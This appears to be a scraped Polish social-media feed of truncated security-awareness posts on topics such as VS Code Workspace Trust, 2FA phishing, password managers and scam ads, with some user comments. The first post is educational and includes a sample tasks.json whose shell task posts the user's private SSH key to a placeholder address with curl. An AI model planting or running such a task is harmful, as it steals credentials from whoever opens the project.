Visual Studio Code posiada funkcję Workspace Trust. Ale po co ona jest? #od0dopentestera
TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk Yes, I Trust - potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.

Projekt w Visual Studio Code może posiadać specjalny plik .vscode/tasks.json. Dla przykładu:

{
"version": "2.0.0",
"tasks": [
{
"label": "Uruchom testy",
"type": "shell",
"group": "test",
"command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
"runOptions": {
KacperSzurek - Visual Studio Code posiada funkcję Workspace Trust. Ale po co ona jest...
Nowoczesne przeglądarki posiadają funkcję powiadomień. Sklepy mogą tak informować nas o nowych promocjach. Ale z opcji tej zaczęli też korzystać przestępcy. #od0dopentestera

Przeglądając Internet możesz natrafić na stronę, na której obrazek robota informuje Cię, że aby przejść dalej musisz potwierdzić, że jesteś człowiekiem. Ale nic się nie bój. To bardzo proste. Wystarczy tylko kliknąć guzik zezwalaj.

W ten sposób przeglądarka prosi Cię o pozwolenie na pokazywanie powiadomień. Ale sporo osób może
KacperSzurek - Nowoczesne przeglądarki posiadają funkcję powiadomień. Sklepy mogą tak...

źródło: F3MDMMMG

Pobierz
Blokada reklam może czasami zwiększyć bezpieczeństwo użytkowników - zwłaszcza tych starszych, bardziej podatnych na manipulacje. Jak to możliwe? #od0dopentestera

* Wiele osób poszukuje strony do logowania do swojego banku w wyszukiwarce. Może tak trafić na fałszywą reklamę banku. Ostatnio było sporo takich przypadków: Bank Pekao, Bank Millennium, Bank BNP Paribas.
* Sporo osób nie wie, że w wyszukiwarce mogą być reklamy. Łatwo nie zauważyć oznaczenia "reklama" jeśli
KacperSzurek - Blokada reklam może czasami zwiększyć bezpieczeństwo użytkowników - zw...

źródło: TEGDNYWG

Pobierz
A Wy co sądzicie o tym pomyśle?

@KacperSzurek: Zgoda, blocker jest w dzisiejszych czasach obowiązkowy. I nie chodzi tylko o strony złośliwe ale głównie o prywatność, oszczędność zasobów i prędkość działania stron.

Ja bym nawet rozważył no-script jak ktoś jest bardziej zaawansowanym użytkownikiem. Ilość zbędnych skryptów, trackerów etc ładowana z większością stron jest zatrważająca.

Natomiast co do aspektów moralnych - na reklamach można zarabiać w rożny sposób. Nie trzeba od razu
Jak zdenerwować legalnych użytkowników? Dodając system DRM do zakupionego produku. #od0dopentestera

Istnieje zautomatyzowana kuweta, która wykorzystuje plastikowe granulki i automatycznie czyści kocią toaletę. Urządzenie do swojego działania potrzebuje specjalnego pojemnika. Ten uwalnia odpowiednią porcję roztworu. Możesz pomyśleć, że wystarczy ponownie napełnić zużyte opakowanie przy pomocy zamiennika. Ale nic z tego. Każdy kartridż posiada tag RFID. Kuweta odczytuje identyfikator i zapisuje liczbę użyć.
To dość znany model biznesowy.
KacperSzurek - Jak zdenerwować legalnych użytkowników? Dodając system DRM do zakupion...
Jak sprzedawano niedziałające figurki Myszki Miki? O sztuczkach sprzedawców-oszustów. #od0dopentestera

Kojarzysz figurki Myszki Miki radośnie tańczące w rytm muzyki? Jeszcze kilka lat temu sprzedawano takie na ulicach w Polsce. Dzieci, które namówiły rodziców na zakup mogły być bardzo rozczarowane. Bo na prowizorycznej scenie zawsze znajdował się magnetofon. Do niego przyczepiona była prawie niewidoczna nić, która była poruszana przez silniczek. To dlatego wydawało się, że myszka tańczy.
100 lat temu
KacperSzurek - Jak sprzedawano niedziałające figurki Myszki Miki? O sztuczkach sprzed...
Tym razem kilka mniej znanych metod antykradzieżowych. #od0dopentestera
Wózek z supermarketu może kosztować nawet 500 złotych. To, że musisz wrzucić do niego 5 złotych wcale nie jest zabezpieczeniem. To socjotechnika, która zachęca Cię do odłożenia wózka na swoje miejsce. W USA popularne są żółte linie na parkingach. Koło w wózku ma silniczek i mechanizm wykrywający czy przejechałeś poza wyznaczone miejsce. Wtedy bolec blokuje koło i w zamyśle kradzież całego
KacperSzurek - Tym razem kilka mniej znanych metod antykradzieżowych. #od0dopentester...
Grasz w gry? Pewno nieraz musiałeś grać z oszustami, którzy używając specjalnych programów próbują uzyskać przewagę w meczach. Ale jak się ich wykrywa? Skąd gra wie, że akurat ta osoba wykorzystuje nieuczciwe praktyki? #od0dopentestera

Dawniej serwery wysyłały do wszystkich graczy te same dane. Czyli każdy komputer biorący udział w danej rozgrywce posiadał informacje o tym gdzie są inni gracze i co robią. Gra po prostu nie wyświetlała tych informacji na
KacperSzurek - Grasz w gry? Pewno nieraz musiałeś grać z oszustami, którzy używając s...
Pamiętasz swój klucz do Windowsa? Kupując legalne oprogramowanie oprócz płyty otrzymywało się certyfikat autentyczności z wydrukowanymi kilkoma znakami. Ale skąd system wiedział, że ten kod jest prawidłowy? #od0dopentestera
Teoretycznie można umieścić wszystkie klucze w kodzie programu. Ale nikt tak nie robi. Bo co jeśli jest ich na przykład 100 000?
Wykorzystuje się algorytm, który na podstawie matematycznych operacji weryfikuje poprawność klucza. Wyobraź sobie, że kod produktu składa się z samych
KacperSzurek - Pamiętasz swój klucz do Windowsa? Kupując legalne oprogramowanie opróc...
Nie wszystkie kampanie reklamowe kończą się sukcesem. Czasami mogą narazić firmę na spore straty. #od0dopentestera

Producent odkurzaczy zaoferował darmowe bilety do USA w zamian za zakup swoich produktów za co najmniej £100. Procedura odbioru nagrody była skomplikowana. Wymagała wysyłania paragonu i specjalnego formularza. Poza tym firma mogła odrzucić nasze propozycje terminów. Ale i tak gdy oferuje się coś wartego 600$ za £100 - firma może stracić płynność finansową.
Podczas Igrzysk
KacperSzurek - Nie wszystkie kampanie reklamowe kończą się sukcesem. Czasami mogą nar...
otrzymywało się gry o wartości grubo ponad 1000.

7 milionów punktów Pepsi można było wymienić na samolot szturmowy. Taka informacja pojawiła się w reklamie telewizyjnej. Punkty otrzymywało się za zakupy określonych produktów. Pojedyncza butelka zazwyczaj dawała jeden lub dwa takie punkty. Ale w regulaminie widniała informacja, że jeśli masz 15 punktów - brakujące X możesz dokupić w cenie 10 centów sztuka. John Leonard wysłał więc czek na 700 000$. Firma odpowiedziała,
Używasz kodów 2FA generowanych przez aplikację na telefonie? Super. Ale warto pamiętać, że ta metoda nie jest odporna na phishing. #od0dopentestera
Ale jak to? To proste. Te kody możesz podać na złośliwej stronie/podyktować przestępcy podszywającemu się przez telefon.
Jak to wygląda w praktyce możesz zobaczyć w tym fragmencie filmu - gdzie moi widzowie logują się na wcześniej założone konto - bo wyświetlam im kod 2FA.
Jakie jest rozwiązanie tego problemu? Klucze
KacperSzurek - Używasz kodów 2FA generowanych przez aplikację na telefonie? Super. Al...
Chciałbyś korzystać z menadżera haseł ale nie jesteś do niego przekonany? Spróbuję obalić pewne mity i obawy. #od0dopentestera

1. Bo jest drogi. To nieprawda.
Istnieją całkowicie darmowe rozwiązania (np. KeePassXC, menadżer w Google Chrome) lub też rozwiązania freemium - gdzie tylko zaawansowane funkcje są płatne (np. Bitwarden).
2. Bo szybciej wpiszę hasło ręcznie. Wątpię.
Hasło może się uzupełniać automatycznie zaraz po załadowaniu strony (jeśli włączysz odpowiednią opcję -
KacperSzurek - Chciałbyś korzystać z menadżera haseł ale nie jesteś do niego przekona...
Zastanawiałeś się jak przestępcy "łamią hasła"? Szybkie wytłumaczenie jak działa hashcat. #od0dopentestera
Hasła użytkowników zazwyczaj przechowujemy w bazie. Przy pomocy ataku SQL Injection czasami można je wykraść. Firmy chcą minimalizować skutki takiego wycieku dlatego zapisują je w formie hasha.
Funkcja skrótu zamienia hasło na hash. Można to porównać do miksera, który robi smoothie. Z tych samych owoców – powstaje to samo smoothie. To samo hasło daje ten sam hash.
KacperSzurek - Zastanawiałeś się jak przestępcy "łamią hasła"? Szybkie wytłumaczenie ...
A ja tam nie lubię manadzerow hasel, bo korzystam z wielu urzadzen, z wielu roznych typow kont i w praktyce raz to dziala, gdzie indziej nie, bo hasło idzie przez program/apke i jest dupa.

Imo można połączyć łatwe do zapamietania hasła z niemożliwością ich do złamania przez różne programy crackerskie, jak te omowione pod warunkiem oczywiście, że takie hasło nie wycieknie w plaintekście ale wtedy i tak już dupa (chociaż nie wiem
Luck_89 - A ja tam nie lubię manadzerow hasel, bo korzystam z wielu urzadzen, z wielu...

źródło: comment_16490821100nVNgLG1hNLYJNHua5iXQS.jpg

Pobierz
Cisza służy powodzeniu operacji wojskowych. Nie wszyscy rozumieją, że publikowanie zdjęć samolotów czy informowanie o ruchach wojsk może utrudnić pracę. Postanowiłem znaleźć kilkanaście przykładów i na ich podstawie pokazać, jak z pozoru błahe informacje mogły wpłynąć na bezpieczeństwo ludzi. #od0dopentestera

Prezydent Ukrainy spotkał się ostatnio z Senatorami USA poprzez wideokonferencję. Dwóch z nich – pochwaliło się tym faktem na Twitterze. Teoretycznie mogli tak pomóc w namierzeniu prezydenta. W przeszłości
KacperSzurek - Cisza służy powodzeniu operacji wojskowych. Nie wszyscy rozumieją, że ...
@KacperSzurek: o, powiem, bo akurat jestem w trakcie oglądania twojego filmu. Jakiś czas temu próbował się ze mną skontaktować dzielnicowy z rodzinnego miasta. Wydzwaniał mi po całej rodzinie, bo nie mógł znaleźć mojego numeru. Jak już w końcu do niego zadzwoniłem i kazałem przestać mi rodzinę prześladować, to z rozmowy wynikło, że ta rejestracja numerów per osoba jest dla policji uja warta. Mówi, że oni nie mają wjazdu w tą bazę,
Jak rozpoznać fake news? Czasami wystarczy kilka kliknięć. Uwaga: informacje dla początkujących. #od0dopentestera
Jeżeli używasz przeglądarki Chrome - to klikając prawym przyciskiem myszy na obrazku możesz wyszukać podobne grafiki wybierając opcję "szukaj grafiki za pomocą obiektywu Google".
Być może ktoś wykorzystał stare zdjęcie i dodał nowy opis pasujący do obecnych czasów.
Nie da się tak jednak wyszukiwać filmów. Musisz zrobić zdjęcie jednej klatki i wysłać je w Google Grafika.
KacperSzurek - Jak rozpoznać fake news? Czasami wystarczy kilka kliknięć. Uwaga: info...
Broń atomowa to potężne narzędzie zagłady. Nie zawsze bezpieczeństwo było priorytetem. #od0dopentestera
Początkowo głównym zabezpieczeniem były "zatyczki uzbrajające". Działały podobnie jak bezpiecznik. Podczas lotu zamieniano zieloną (bezpieczną) zatyczkę - na tą bojową (czerwoną).
Z czasem podzielono broń na 2 części. Od tego momentu należało ręcznie otworzyć właz i włożyć do środka wielką kulę.
Później wprowadzono "silne połączenie". Był to mechanizm, który miał reagować tylko na jeden,
KacperSzurek - Broń atomowa to potężne narzędzie zagłady. Nie zawsze bezpieczeństwo b...
Kilka porad powiązanych z bezpieczeństwem. #od0dopentestera

1. Ustaw limity na usługi premium. Wyłącz WAP Billing.
2. Gdy sprzedajesz coś na portalach ogłoszeniowych - kup nowy starter do tego celu lub wykup usługę ekstra numer.
3. Nie klikaj w żadne linki z SMSów. Duże firmy nie powinny ich wysyłać.
4. Możesz sprawdzić po numerze rejestracyjnym czy samochód ma ważne ubezpieczenie OC.
5. Wykup usługę Alerty BIK. A jeśli
KacperSzurek - Kilka porad powiązanych z bezpieczeństwem. #od0dopentestera

1. Usta...
Jak złośliwe oprogramowanie dostaje się na nasze komputery? Często sami je pobieramy i uruchamiamy. Jak to możliwe?
Przestępcy wykorzystują różne metody socjotechniczne by przekonać nas do złośliwego działania. #od0dopentestera

Przestępcy też wykupują reklamy w wyszukiwarkach.
Wtedy, gdy użytkownik szuka swojego ulubionego programu to nie trafia na stronę producenta ale na witrynę atakujących.
Sam pobiera aplikację będąc przekonanym, że jest bezpieczny.
Wierzy, że pierwszy wynik jest tym właściwym.

Strony
KacperSzurek - Jak złośliwe oprogramowanie dostaje się na nasze komputery? Często sam...
Czy wiesz czym jest "cyfrowy testament"? #od0dopentestera
Możesz pozostawić dostęp do swoich kont/emaili/menedżerów haseł swojej rodzinie w razie poważnego wypadku/swojej śmierci.
1. Google posiada menedżer nieaktywnych kont.
Określamy tam, kiedy Google ma uznać nasze konto za nieaktywne.
Wybieramy również kto ma zostać powiadomiony i jakie dane mają mu zostać przekazane.
Możesz też zdecydować czy konto ma zostać usunięte.

2. Jeżeli zmarły nie pozostawił jasnych instrukcji można przesłać specjalną prośbę.
Procedura
KacperSzurek - Czy wiesz czym jest "cyfrowy testament"? #od0dopentestera
Możesz pozo...

źródło: comment_1640866339BO2XyFaninUvubDrkfAHm2.jpg

Pobierz